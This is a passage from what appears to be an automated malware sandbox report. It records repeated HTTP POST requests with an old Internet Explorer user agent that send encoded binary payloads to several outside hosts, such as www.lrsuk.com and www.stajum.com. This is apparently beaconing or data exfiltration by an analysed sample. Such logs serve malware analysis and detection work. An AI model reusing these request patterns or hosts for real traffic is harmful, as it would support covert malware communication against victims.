55 5a 47 4f 58 58 58 57 37 34 6c 6e 76 6b 78 4d 62 38 34 6b 54 37 6c 59 34 78 78 66 6b 43 31 6a 66 78 78 2f 6c 35 48 4d 6c 54 79 51 61 73 70 50 56 48 61 48 5a 79 71 5a 31 31 7a 66 45 42 2f 78 50 55 35 52 58 61 59 48 35 53 31 33 52 46 6d 32 4a 4a 33 70 37 4c 78 4d 35 62 38 2b 4e 67 70 2f 39 6f 4f 2b 6a 2b 37 54 70 4c 6b 61 42 4c 75 59 48 48 32 57 61 77 4f 73 7a 38 37 6c 57 45 45 31 68 74 61 38 4b 79 72 44 74 54 6f 74 53 66 6a 51 41 58 50 66 68 63 79 64 2b 75 77 2b 2b 78 51 74 5a 73 56 51 45 39 42 30 30 76 57 43 34 53 35 4d 4d 35 56 56 71 6d 2b 50 67 45 70 54 70 58 37 6f 70 33 63 56 66 4f 51 6e 66 47 54 30 48 37 6d 45 33 48 79 56 41 71 65 32 70 44 70 59 58 49 6b 2f 66 6d 7a 68 42 34 78 2b 35 75 77 47 2b 35 5a 32 68 6e 36 57 50 43 5a 51 65 31 43 52 62 54 69 79 48 36 4f 61 2f 56 36 52 5a 41 6a 73 5a 63 64 38 37 4d 6b 4c 6f 61 59 58 4f 73 57 59 47 68 4d 5a 46 49 4d 41 38 54 45 7a 35 56 76 6b 77 4b 4a 56 57 58 65 63 4c 53 57 44 46 57 54 32 47 2b 57 69 48 4c 45 31 30 66 65 6d 39 42 2b 33 63 62 78 32 74 55 65 73 44 73 33 45 74 62 30 43 4b 32 44 72 46 41 3d 3d Data Ascii: eI6kBxTpk5UyRbSh78HDhmc1GPaMD7LKiMeFuWKzUGbj3cT1HUU3CGusmcv4DsXUNbEqDyopzXmcRRIOkMMDexrncmmHkdyFIui2R7JQrJOB2gue3iLrMQS2HZw7ljLA/gtmpwsgp6qJ47pWnoQKd5VnjhXKzJstzYrVw/FijWUx8ClclJsWN4T25ne3t2zNUZGOXXXW74lnvkxMb84kT7lY4xxfkC1jfxx/l5HMlTyQaspPVHaHZyqZ11zfEB/xPU5RXaYH5S13RFm2JJ3p7LxM5b8+Ngp/9oO+j+7TpLkaBLuYHH2WawOsz87lWEE1hta8KyrDtTotSfjQAXPfhcyd+uw++xQtZsVQE9B00vWC4S5MM5VVqm+PgEpTpX7op3cVfOQnfGT0H7mE3HyVAqe2pDpYXIk/fmzhB4x+5uwG+5Z2hn6WPCZQe1CRbTiyH6Oa/V6RZAjsZcd87MkLoaYXOsWYGhMZFIMA8TEz5VvkwKJVWXecLSWDFWT2G+WiHLE10fem9B+3cbx2tUesDs3Etb0CK2DrFA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 65 49 36 6b 42 78 54 70 6b 35 55 79 52 62 53 68 37 38 48 44 68 6d 63 31 47 50 61 4d 44 37 4c 4b 69 4d 65 46 75 57 4b 7a 55 47 62 6a 33 63 54 31 48 55 55 33 43 47 75 73 6d 63 76 34 44 73 58 55 4e 62 45 71 44 79 6f 70 7a 58 6d 63 52 52 49 4f 6b 4d 4d 44 65 78 72 6e 63 6d 6d 48 6b 64 79 46 49 75 69 32 52 37 4a 51 72 4a 4f 42 32 67 75 65 33 69 4c 72 4d 51 53 32 48 5a 77 37 6c 6a 4c 41 2f 67 74 6d 70 77 73 67 70 36 71 4a 34 37 70 57 6e 6f 51 4b 64 35 56 6e 6a 68 58 4b 7a 4a 73 74 7a 59 72 56 77 2f 46 69 6a 57 55 78 38 43 6c 63 6c 4a 73 57 4e 34 54 32 35 6e 65 33 74 32 7a 4e 55 5a 47 4f 58 58 58 57 37 34 6c 6e 76 6b 78 4d 62 38 34 6b 54 37 6c 59 34 78 78 66 6b 43 31 6a 66 78 78 2f 6c 35 48 4d 6c 54 79 51 61 73 70 50 56 48 61 48 5a 79 71 5a 31 31 7a 66 45 42 2f 78 50 55 35 52 58 61 59 48 35 53 31 33 52 46 6d 32 4a 4a 33 70 37 4c 78 4d 35 62 38 2b 4e 67 70 2f 39 6f 4f 2b 6a 2b 37 54 70 4c 6b 61 42 4c 75 59 48 48 32 57 61 77 4f 73 7a 38 37 6c 57 45 45 31 68 74 61 38 4b 79 72 44 74 54 6f 74 53 66 6a 51 41 58 50 66 68 63 79 64 2b 75 77 2b 2b 78 51 74 5a 73 56 51 45 39 42 30 30 76 57 43 34 53 35 4d 4d 35 56 56 71 6d 2b 50 67 45 70 54 70 58 37 6f 70 33 63 56 66 4f 51 6e 66 47 54 30 48 37 6d 45 33 48 79 56 41 71 65 32 70 44 70 59 58 49 6b 2f 66 6d 7a 68 42 34 78 2b 35 75 77 47 2b 35 5a 32 68 6e 36 57 50 43 5a 51 65 31 43 52 62 54 69 79 48 36 4f 61 2f 56 36 52 5a 41 6a 73 5a 63 64 38 37 4d 6b 4c 6f 61 59 58 4f 73 57 59 47 68 4d 5a 46 49 4d 41 38 54 45 7a 35 56 76 6b 77 4b 4a 56 57 58 65 63 4c 53 57 44 46 57 54 32 47 2b 57 69 48 4c 45 31 30 66 65 6d 39 42 2b 33 63 62 78 32 74 55 65 73 44 73 33 45 74 62 30 43 4b 32 44 72 46 41 3d 3d Data Ascii: eI6kBxTpk5UyRbSh78HDhmc1GPaMD7LKiMeFuWKzUGbj3cT1HUU3CGusmcv4DsXUNbEqDyopzXmcRRIOkMMDexrncmmHkdyFIui2R7JQrJOB2gue3iLrMQS2HZw7ljLA/gtmpwsgp6qJ47pWnoQKd5VnjhXKzJstzYrVw/FijWUx8ClclJsWN4T25ne3t2zNUZGOXXXW74lnvkxMb84kT7lY4xxfkC1jfxx/l5HMlTyQaspPVHaHZyqZ11zfEB/xPU5RXaYH5S13RFm2JJ3p7LxM5b8+Ngp/9oO+j+7TpLkaBLuYHH2WawOsz87lWEE1hta8KyrDtTotSfjQAXPfhcyd+uw++xQtZsVQE9B00vWC4S5MM5VVqm+PgEpTpX7op3cVfOQnfGT0H7mE3HyVAqe2pDpYXIk/fmzhB4x+5uwG+5Z2hn6WPCZQe1CRbTiyH6Oa/V6RZAjsZcd87MkLoaYXOsWYGhMZFIMA8TEz5VvkwKJVWXecLSWDFWT2G+WiHLE10fem9B+3cbx2tUesDs3Etb0CK2DrFA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheData Raw: 51 68 52 6d 56 44 4e 6e 6c 70 56 7a 73 49 61 38 65 6f 49 72 31 74 79 66 32 44 79 5a 62 65 6f 4d 46 32 68 6a 72 67 72 4a 56 4d 4b 59 2b 6d 63 33 43 54 35 4a 30 75 6e 6b 31 32 51 69 65 53 69 55 71 68 44 67 73 61 6c 6a 48 38 44 54 5a 7a 47 69 47 48 54 51 78 52 57 30 6b 65 71 70 30 65 71 6a 6d 78 47 45 43 48 4e 53 64 47 42 43 6d 6a 48 35 47 51 53 69 55 7a 70 6e 2b 43 62 61 63 66 51 59 62 37 6d 43 65 4e 6a 4d 4c 31 67 4f 6b 46 4f 35 6f 46 56 78 50 33 4c 50 39 55 70 33 6b 4c 70 44 31 4c 54 58 56 66 7a 58 30 39 32 65 46 4f 62 49 78 49 58 75 67 75 52 61 65 72 46 6d 55 69 58 48 47 64 4e 55 6d 43 2f 72 6e 4d 31 39 65 47 6c 34 70 5a 67 74 31 74 6f 6a 62 4d 77 59 74 45 46 52 73 41 56 51 45 64 42 4a 46 51 47 73 4b 61 50 4a 41 32 70 58 6f 45 77 53 4f 58 56 2b 38 50 67 47 78 30 33 5a 67 32 4c 44 69 34 38 76 45 55 70 77 48 42 32 78 75 71 2b 45 45 6c 4a 46 77 79 54 50 6c 47 74 45 66 6c 70 71 4b 67 75 57 46 6a 4d 57 6d 51 31 70 67 57 36 70 6d 50 79 36 77 47 34 76 46 6b 6f 58 5a 50 2f 4c 74 6e 45 38 6a 68 75 49 59 38 4f 66 46 65 76 30 6d 4c 6b 32 67 35 46 4e 37 61 79 41 76 6d 6c 48 63 53 42 47 39 4f 62 58 66 79 36 42 66 36 59 69 6c 46 6a 4d 30 67 6f 4e 73 7a 4c 44 7a 4c 36 57 6f 6e 42 35 33 4f 2f 53 4b 68 6d 74 31 5a 70 56 37 64 71 78 4c 6c 4f 78 61 42 64 56 70 73 45 45 30 53 67 78 67 72 56 57 73 77 63 67 56 69 56 4a 37 45 59 58 6d 56 56 66 4d 4d 68 78 71 4a 57 43 52 33 66 36 38 57 52 58 49 54 54 7a 68 39 6a 43 37 4a 7a 4c 56 72 71 41 42 6b 62 2b 41 41 43 73 38 57 6a 2f 67 2f 58 2b 2f 57 63 6b 58 68 4c 75 72 56 76 30 4b 74 52 62 72 35 30 6c 6e 59 53 58 6b 65 44 2b 56 39 73 70 33 6e 75 73 32 53 74 54 44 68 4c 30 Data Ascii: QhRmVDNnlpVzsIa8eoIr1tyf2DyZbeoMF2hjrgrJVMKY+mc3CT5J0unk12QieSiUqhDgsaljH8DTZzGiGHTQxRW0keqp0eqjmxGECHNSdGBCmjH5GQSiUzpn+CbacfQYb7mCeNjML1gOkFO5oFVxP3LP9Up3kLpD1LTXVfzX092eFObIxIXuguRaerFmUiXHGdNUmC/rnM19eGl4pZgt1tojbMwYtEFRsAVQEdBJFQGsKaPJA2pXoEwSOXV+8PgGx03Zg2LDi48vEUpwHB2xuq+EElJFwyTPlGtEflpqKguWFjMWmQ1pgW6pmPy6wG4vFkoXZP/LtnE8jhuIY8OfFev0mLk2g5FN7ayAvmlHcSBG9ObXfy6Bf6YilFjM0goNszLDzL6WonB53O/SKhmt1ZpV7dqxLlOxaBdVpsEE0SgxgrVWswcgViVJ7EYXmVVfMMhxqJWCR3f68WRXITTzh9jC7JzLVrqABkb+AACs8Wj/g/X+/WckXhLurVv0KtRbr50lnYSXkeD+V9sp3nus2StTDhL0
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 65 75 4e 5a 68 42 64 47 6f 4a 58 6c 6b 56 39 69 42 71 79 2b 69 57 43 77 56 67 31 4e 77 47 48 67 4f 32 50 65 2b 62 38 6b 6f 73 57 41 4c 6f 4f 30 38 58 4b 52 53 6e 68 56 47 6e 4e 77 4e 33 2f 78 7a 52 50 2b 6a 49 50 6c 39 4c 41 51 76 75 58 52 43 64 54 4f 47 72 58 57 55 61 76 65 78 61 73 4b 7a 37 47 75 2f 6b 32 61 38 53 76 68 63 53 71 61 62 2f 4e 4b 4c 72 65 6a 71 34 36 68 39 47 75 41 65 36 64 34 32 64 6f 53 79 39 43 58 32 70 43 6e 45 41 55 36 54 67 49 73 74 38 73 73 57 51 55 68 62 66 6f 62 50 45 58 42 37 67 33 45 73 52 70 48 57 75 42 4c 79 71 78 6f 56 67 42 6f 75 6a 36 38 69 50 56 57 45 42 6f 6c 53 59 43 5a 61 77 50 79 4a 68 67 77 73 6e 46 59 71 71 76 38 4f 79 77 78 4c 6c 54 67 45 57 44 54 31 59 6d 52 59 58 79 54 5a 33 4b 4e 5a 6e 48 47 49 4d 35 49 46 50 67 74 4b 51 78 75 63 63 33 2f 64 64 70 70 52 4c 48 75 6a 58 43 77 62 4e 2b 4a 76 47 78 4e 56 49 49 51 31 68 67 6f 49 4e 38 62 6f 79 56 5a 46 42 47 34 78 61 54 43 57 63 4a 2f 68 7a 55 48 65 36 4c 67 39 4e 2b 53 30 57 71 37 71 36 57 76 76 6b 63 74 6b 65 55 57 49 59 79 56 61 71 31 48 4a 33 58 35 58 44 30 61 63 46 56 61 63 44 4c 41 51 4d 4f 55 37 6a 47 4e 2f 61 38 70 34 4d 46 59 4a 41 45 59 45 71 72 39 69 41 69 2f 74 30 52 6f 53 77 63 7a 58 39 31 6e 6a 6e 69 75 52 6e 42 58 53 67 6c 79 67 61 32 69 5a 55 72 4d 69 59 31 56 56 6d 6f 42 79 43 31 73 42 34 6a 45 62 7a 65 53 48 76 6d 67 71 70 34 67 66 37 76 30 50 71 57 51 65 49 49 70 56 4d 6a 73 35 55 44 62 66 36 32 47 6d 66 6c 65 33 74 33 33 59 62 44 37 75 41 58 57 32 6f 57 50 39 65 32 2f 70 7a 36 33 74 33 32 31 76 72 53 32 38 62 37 4e 43 68 4a 51 34 52 61 78 6c 35 35 37 72 36 71 65 5a 6d 68 78 6e 49 73 75 48 55 65 7a 70 70 30 3d Data Ascii: euNZhBdGoJXlkV9iBqy+iWCwVg1NwGHgO2Pe+b8kosWALoO08XKRSnhVGnNwN3/xzRP+jIPl9LAQvuXRCdTOGrXWUavexasKz7Gu/k2a8SvhcSqab/NKLrejq46h9GuAe6d42doSy9CX2pCnEAU6TgIst8ssWQUhbfobPEXB7g3EsRpHWuBLyqxoVgBouj68iPVWEBolSYCZawPyJhgwsnFYqqv8OywxLlTgEWDT1YmRYXyTZ3KNZnHGIM5IFPgtKQxucc3/ddppRLHujXCwbN+JvGxNVIIQ1hgoIN8boyVZFBG4xaTCWcJ/hzUHe6Lg9N+S0Wq7q6WvvkctkeUWIYyVaq1HJ3X5XD0acFVacDLAQMOU7jGN/a8p4MFYJAEYEqr9iAi/t0RoSwczX91njniuRnBXSglyga2iZUrMiY1VVmoByC1sB4jEbzeSHvmgqp4gf7v0PqWQeIIpVMjs5UDbf62Gmfle3t33YbD7uAXW2oWP9e2/pz63t321vrS28b7NChJQ4Raxl557r6qeZmhxnIsuHUezpp0=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 65 75 4e 5a 68 42 64 47 6f 4a 58 6c 6b 56 39 69 42 71 79 2b 69 57 43 77 56 67 31 4e 77 47 48 67 4f 32 50 65 2b 62 38 6b 6f 73 57 41 4c 6f 4f 30 38 58 4b 52 53 6e 68 56 47 6e 4e 77 4e 33 2f 78 7a 52 50 2b 6a 49 50 6c 39 4c 41 51 76 75 58 52 43 64 54 4f 47 72 58 57 55 61 76 65 78 61 73 4b 7a 37 47 75 2f 6b 32 61 38 53 76 68 63 53 71 61 62 2f 4e 4b 4c 72 65 6a 71 34 36 68 39 47 75 41 65 36 64 34 32 64 6f 53 79 39 43 58 32 70 43 6e 45 41 55 36 54 67 49 73 74 38 73 73 57 51 55 68 62 66 6f 62 50 45 58 42 37 67 33 45 73 52 70 48 57 75 42 4c 79 71 78 6f 56 67 42 6f 75 6a 36 38 69 50 56 57 45 42 6f 6c 53 59 43 5a 61 77 50 79 4a 68 67 77 73 6e 46 59 71 71 76 38 4f 79 77 78 4c 6c 54 67 45 57 44 54 31 59 6d 52 59 58 79 54 5a 33 4b 4e 5a 6e 48 47 49 4d 35 49 46 50 67 74 4b 51 78 75 63 63 33 2f 64 64 70 70 52 4c 48 75 6a 58 43 77 62 4e 2b 4a 76 47 78 4e 56 49 49 51 31 68 67 6f 49 4e 38 62 6f 79 56 5a 46 42 47 34 78 61 54 43 57 63 4a 2f 68 7a 55 48 65 36 4c 67 39 4e 2b 53 30 57 71 37 71 36 57 76 76 6b 63 74 6b 65 55 57 49 59 79 56 61 71 31 48 4a 33 58 35 58 44 30 61 63 46 56 61 63 44 4c 41 51 4d 4f 55 37 6a 47 4e 2f 61 38 70 34 4d 46 59 4a 41 45 59 45 71 72 39 69 41 69 2f 74 30 52 6f 53 77 63 7a 58 39 31 6e 6a 6e 69 75 52 6e 42 58 53 67 6c 79 67 61 32 69 5a 55 72 4d 69 59 31 56 56 6d 6f 42 79 43 31 73 42 34 6a 45 62 7a 65 53 48 76 6d 67 71 70 34 67 66 37 76 30 50 71 57 51 65 49 49 70 56 4d 6a 73 35 55 44 62 66 36 32 47 6d 66 6c 65 33 74 33 33 59 62 44 37 75 41 58 57 32 6f 57 50 39 65 32 2f 70 7a 36 33 74 33 32 31 76 72 53 32 38 62 37 4e 43 68 4a 51 34 52 61 78 6c 35 35 37 72 36 71 65 5a 6d 68 78 6e 49 73 75 48 55 65 7a 70 70 30 3d Data Ascii: euNZhBdGoJXlkV9iBqy+iWCwVg1NwGHgO2Pe+b8kosWALoO08XKRSnhVGnNwN3/xzRP+jIPl9LAQvuXRCdTOGrXWUavexasKz7Gu/k2a8SvhcSqab/NKLrejq46h9GuAe6d42doSy9CX2pCnEAU6TgIst8ssWQUhbfobPEXB7g3EsRpHWuBLyqxoVgBouj68iPVWEBolSYCZawPyJhgwsnFYqqv8OywxLlTgEWDT1YmRYXyTZ3KNZnHGIM5IFPgtKQxucc3/ddppRLHujXCwbN+JvGxNVIIQ1hgoIN8boyVZFBG4xaTCWcJ/hzUHe6Lg9N+S0Wq7q6WvvkctkeUWIYyVaq1HJ3X5XD0acFVacDLAQMOU7jGN/a8p4MFYJAEYEqr9iAi/t0RoSwczX91njniuRnBXSglyga2iZUrMiY1VVmoByC1sB4jEbzeSHvmgqp4gf7v0PqWQeIIpVMjs5UDbf62Gmfle3t33YbD7uAXW2oWP9e2/pz63t321vrS28b7NChJQ4Raxl557r6qeZmhxnIsuHUezpp0=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 33 77 46 33 37 47 74 58 6d 35 58 75 73 6c 4e 6a 51 67 57 61 51 39 52 51 72 35 6f 78 62 69 51 4a 7a 38 64 71 71 49 65 2b 70 4a 30 67 5a 51 32 79 6b 33 72 6a 47 48 6c 73 42 43 47 56 4d 48 55 65 76 59 4e 41 52 52 59 4a 38 6f 43 49 7a 69 31 59 78 4e 57 30 58 4f 59 71 4d 42 61 58 4c 6f 31 35 2f 32 50 55 6b 42 6e 7a 71 59 76 4c 6b 4f 55 70 32 58 61 78 31 6a 56 4d 56 33 50 37 45 57 62 36 32 75 64 48 41 34 61 45 37 30 41 30 57 6f 65 37 6b 39 4c 73 68 4b 54 4f 54 75 4c 56 4b 65 6f 33 33 6d 56 2f 71 38 51 45 65 56 33 42 57 57 49 34 59 57 43 71 78 41 6a 70 39 49 49 6e 61 55 62 6a 63 57 67 64 49 56 5a 63 36 34 61 42 69 41 63 5a 72 54 46 6b 69 70 41 5a 44 46 49 68 37 4d 4b 48 70 2f 78 34 75 56 41 37 4f 6f 74 70 36 78 73 30 68 69 50 4e 34 4e 47 46 41 68 37 46 30 56 56 2f 73 5a 59 34 4a 36 48 76 76 61 68 74 4a 44 4e 6e 6b 72 4f 70 61 34 65 4b 67 57 44 54 32 34 4b 68 63 56 38 78 53 46 63 57 39 55 77 76 55 4a 4e 66 4e 52 62 65 45 38 2f 31 56 48 62 2f 39 32 33 46 4e 34 4e 49 6d 36 39 56 5a 4b 4b 73 67 39 69 42 67 57 30 59 34 6e 45 32 63 35 37 38 37 6a 66 64 73 71 4a 2b 7a 33 4b 78 49 39 56 42 67 56 4b 39 49 62 52 4f 44 42 5a 68 70 4e 68 4c 31 47 49 43 30 6f 30 6f 71 6c 4d 75 42 69 4f 74 32 4c 54 4f 70 75 34 70 32 72 74 44 75 34 56 36 64 74 34 63 7a 38 77 6a 4e 55 35 33 68 44 62 6f 52 4c 56 51 31 78 42 4c 4c 70 4c 2b 48 76 32 66 6a 62 51 67 74 68 77 71 48 6e 2b 4c 4d 55 68 79 4f 69 4a 4e 32 46 4c 78 64 5a 6d 66 65 76 4c 32 62 79 6a 4a 51 6d 66 58 4b 41 67 4d 7a 2f 57 70 74 6d 61 44 57 52 72 39 39 6b 41 52 76 57 42 59 48 68 52 74 76 4a 2f 6a 34 4a 38 79 6a 35 43 69 61 32 71 51 49 7a 32 77 74 59 68 6d 71 68 51 56 76 6f 59 75 4f 71 68 6d 71 44 74 58 4a 45 67 3d Data Ascii: 3wF37GtXm5XuslNjQgWaQ9RQr5oxbiQJz8dqqIe+pJ0gZQ2yk3rjGHlsBCGVMHUevYNARRYJ8oCIzi1YxNW0XOYqMBaXLo15/2PUkBnzqYvLkOUp2Xax1jVMV3P7EWb62udHA4aE70A0Woe7k9LshKTOTuLVKeo33mV/q8QEeV3BWWI4YWCqxAjp9IInaUbjcWgdIVZc64aBiAcZrTFkipAZDFIh7MKHp/x4uVA7Ootp6xs0hiPN4NGFAh7F0VV/sZY4J6HvvahtJDNnkrOpa4eKgWDT24KhcV8xSFcW9UwvUJNfNRbeE8/1VHb/923FN4NIm69VZKKsg9iBgW0Y4nE2c5787jfdsqJ+z3KxI9VBgVK9IbRODBZhpNhL1GIC0o0oqlMuBiOt2LTOpu4p2rtDu4V6dt4cz8wjNU53hDboRLVQ1xBLLpL+Hv2fjbQgthwqHn+LMUhyOiJN2FLxdZmfevL2byjJQmfXKAgMz/WptmaDWRr99kARvWBYHhRtvJ/j4J8yj5Cia2qQIz2wtYhmqhQVvoYuOqhmqDtXJEg=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 33 77 46 33 37 47 74 58 6d 35 58 75 73 6c 4e 6a 51 67 57 61 51 39 52 51 72 35 6f 78 62 69 51 4a 7a 38 64 71 71 49 65 2b 70 4a 30 67 5a 51 32 79 6b 33 72 6a 47 48 6c 73 42 43 47 56 4d 48 55 65 76 59 4e 41 52 52 59 4a 38 6f 43 49 7a 69 31 59 78 4e 57 30 58 4f 59 71 4d 42 61 58 4c 6f 31 35 2f 32 50 55 6b 42 6e 7a 71 59 76 4c 6b 4f 55 70 32 58 61 78 31 6a 56 4d 56 33 50 37 45 57 62 36 32 75 64 48 41 34 61 45 37 30 41 30 57 6f 65 37 6b 39 4c 73 68 4b 54 4f 54 75 4c 56 4b 65 6f 33 33 6d 56 2f 71 38 51 45 65 56 33 42 57 57 49 34 59 57 43 71 78 41 6a 70 39 49 49 6e 61 55 62 6a 63 57 67 64 49 56 5a 63 36 34 61 42 69 41 63 5a 72 54 46 6b 69 70 41 5a 44 46 49 68 37 4d 4b 48 70 2f 78 34 75 56 41 37 4f 6f 74 70 36 78 73 30 68 69 50 4e 34 4e 47 46 41 68 37 46 30 56 56 2f 73 5a 59 34 4a 36 48 76 76 61 68 74 4a 44 4e 6e 6b 72 4f 70 61 34 65 4b 67 57 44 54 32 34 4b 68 63 56 38 78 53 46 63 57 39 55 77 76 55 4a 4e 66 4e 52 62 65 45 38 2f 31 56 48 62 2f 39 32 33 46 4e 34 4e 49 6d 36 39 56 5a 4b 4b 73 67 39 69 42 67 57 30 59 34 6e 45 32 63 35 37 38 37 6a 66 64 73 71 4a 2b 7a 33 4b 78 49 39 56 42 67 56 4b 39 49 62 52 4f 44 42 5a 68 70 4e 68 4c 31 47 49 43 30 6f 30 6f 71 6c 4d 75 42 69 4f 74 32 4c 54 4f 70 75 34 70 32 72 74 44 75 34 56 36 64 74 34 63 7a 38 77 6a 4e 55 35 33 68 44 62 6f 52 4c 56 51 31 78 42 4c 4c 70 4c 2b 48 76 32 66 6a 62 51 67 74 68 77 71 48 6e 2b 4c 4d 55 68 79 4f 69 4a 4e 32 46 4c 78 64 5a 6d 66 65 76 4c 32 62 79 6a 4a 51 6d 66 58 4b 41 67 4d 7a 2f 57 70 74 6d 61 44 57 52 72 39 39 6b 41 52 76 57 42 59 48 68 52 74 76 4a 2f 6a 34 4a 38 79 6a 35 43 69 61 32 71 51 49 7a 32 77 74 59 68 6d 71 68 51 56 76 6f 59 75 4f 71 68 6d 71 44 74 58 4a 45 67 3d Data Ascii: 3wF37GtXm5XuslNjQgWaQ9RQr5oxbiQJz8dqqIe+pJ0gZQ2yk3rjGHlsBCGVMHUevYNARRYJ8oCIzi1YxNW0XOYqMBaXLo15/2PUkBnzqYvLkOUp2Xax1jVMV3P7EWb62udHA4aE70A0Woe7k9LshKTOTuLVKeo33mV/q8QEeV3BWWI4YWCqxAjp9IInaUbjcWgdIVZc64aBiAcZrTFkipAZDFIh7MKHp/x4uVA7Ootp6xs0hiPN4NGFAh7F0VV/sZY4J6HvvahtJDNnkrOpa4eKgWDT24KhcV8xSFcW9UwvUJNfNRbeE8/1VHb/923FN4NIm69VZKKsg9iBgW0Y4nE2c5787jfdsqJ+z3KxI9VBgVK9IbRODBZhpNhL1GIC0o0oqlMuBiOt2LTOpu4p2rtDu4V6dt4cz8wjNU53hDboRLVQ1xBLLpL+Hv2fjbQgthwqHn+LMUhyOiJN2FLxdZmfevL2byjJQmfXKAgMz/WptmaDWRr99kARvWBYHhRtvJ/j4J8yj5Cia2qQIz2wtYhmqhQVvoYuOqhmqDtXJEg=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yoruksut.comCache-Control: no-cacheData Raw: 2b 72 58 67 39 49 73 75 78 5a 55 6f 76 33 63 2f 34 72 4b 51 38 2f 54 55 6e 61 37 52 45 77 58 38 37 37 68 62 54 78 7a 6d 5a 78 36 59 31 4c 6b 56 32 45 31 6d 6d 6a 79 46 44 58 48 77 48 4c 77 6a 58 35 6e 43 43 4b 73 36 61 41 67 74 43 34 6d 61 57 7a 32 66 6e 59 7a 47 34 30 6a 59 51 62 52 6b 6b 6e 59 69 68 42 58 2b 38 68 38 64 47 56 73 35 68 6f 76 72 68 72 42 61 52 49 62 76 61 44 62 57 44 34 59 69 72 69 6e 4f 37 7a 33 4f 72 78 72 6a 6b 69 71 38 2b 65 4d 36 70 61 53 4a 73 4f 7a 54 47 31 45 48 44 34 2b 6b 52 49 48 7a 61 31 56 70 52 6e 76 4f 59 58 71 43 7a 66 64 4a 47 52 4b 4a 51 4f 70 68 78 6b 47 44 41 30 47 39 66 43 47 38 31 57 55 65 74 32 43 62 75 62 4a 53 45 69 65 78 79 69 49 42 42 64 72 63 73 54 42 4a 54 43 6f 47 31 77 6b 4f 57 72 43 41 54 59 48 46 33 42 6f 49 4e 71 6c 6a 2f 43 33 35 49 39 59 46 30 55 2b 42 69 4d 78 77 33 2f 48 79 71 47 6d 7a 75 63 76 39 4b 67 6f 41 52 74 42 32 54 59 4b 31 33 4e 72 53 77 45 37 68 61 4f 6c 61 63 6c 31 31 46 6a 44 4d 4c 34 4b 72 6b 64 56 65 4e 4b 35 67 35 44 41 73 2f 43 73 63 41 43 7a 49 48 45 69 76 73 63 48 6a 57 74 70 6b 77 5a 66 48 50 69 50 39 68 72 48 50 2f 59 48 78 69 47 4f 39 63 4c 41 39 6e 36 61 72 44 49 2b 70 43 79 59 64 64 79 38 43 48 33 76 4f 71 56 6e 55 73 4a 35 6d 53 66 38 5a 50 74 71 52 67 32 57 69 71 31 50 6b 52 51 45 6e 76 2f 4e 4c 31 37 44 2f 52 4f 66 6b 53 6e 6d 4c 38 35 66 4e 61 42 6f 4a 77 31 6c 56 4c 6e 79 59 35 43 74 62 38 62 38 56 6e 62 57 45 59 6c 52 6c 43 7a 5a 4f 77 5a 67 6c 58 76 7a 4b 4a 57 30 72 6c 32 64 59 39 5a 55 56 62 47 55 61 73 43 5a 6b 65 56 4c 31 6e 70 41 55 57 67 7a 5a 74 6a 4f 57 37 58 51 79 7a 50 49 2f 30 6c 73 44 65 34 37 73 4e 48 74 75 72 41 70 63 4f 6e 66 77 73 70 6c 46 77 45 46 56 Data Ascii: +rXg9IsuxZUov3c/4rKQ8/TUna7REwX877hbTxzmZx6Y1LkV2E1mmjyFDXHwHLwjX5nCCKs6aAgtC4maWz2fnYzG40jYQbRkknYihBX+8h8dGVs5hovrhrBaRIbvaDbWD4YirinO7z3Orxrjkiq8+eM6paSJsOzTG1EHD4+kRIHza1VpRnvOYXqCzfdJGRKJQOphxkGDA0G9fCG81WUet2CbubJSEiexyiIBBdrcsTBJTCoG1wkOWrCATYHF3BoINqlj/C35I9YF0U+BiMxw3/HyqGmzucv9KgoARtB2TYK13NrSwE7haOlacl11FjDML4KrkdVeNK5g5DAs/CscACzIHEivscHjWtpkwZfHPiP9hrHP/YHxiGO9cLA9n6arDI+pCyYddy8CH3vOqVnUsJ5mSf8ZPtqRg2Wiq1PkRQEnv/NL17D/ROfkSnmL85fNaBoJw1lVLnyY5Ctb8b8VnbWEYlRlCzZOwZglXvzKJW0rl2dY9ZUVbGUasCZkeVL1npAUWgzZtjOW7XQyzPI/0lsDe47sNHturApcOnfwsplFwEFV
